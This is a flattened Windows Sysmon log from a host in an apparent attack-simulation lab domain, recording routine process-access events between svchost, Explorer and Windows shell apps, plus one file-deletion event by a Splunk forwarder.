12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311D5FE8B46A7CF10E08E960DCE8A9D0,SHA256=A0FED9CA8C5604760E51CF5E760B852408E3D1183F0A4A56D103AAFA1D95CB13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+10928d|C:\Windows\System32\TwinUI.dll+d211f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+10928d|C:\Windows\System32\TwinUI.dll+d211f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 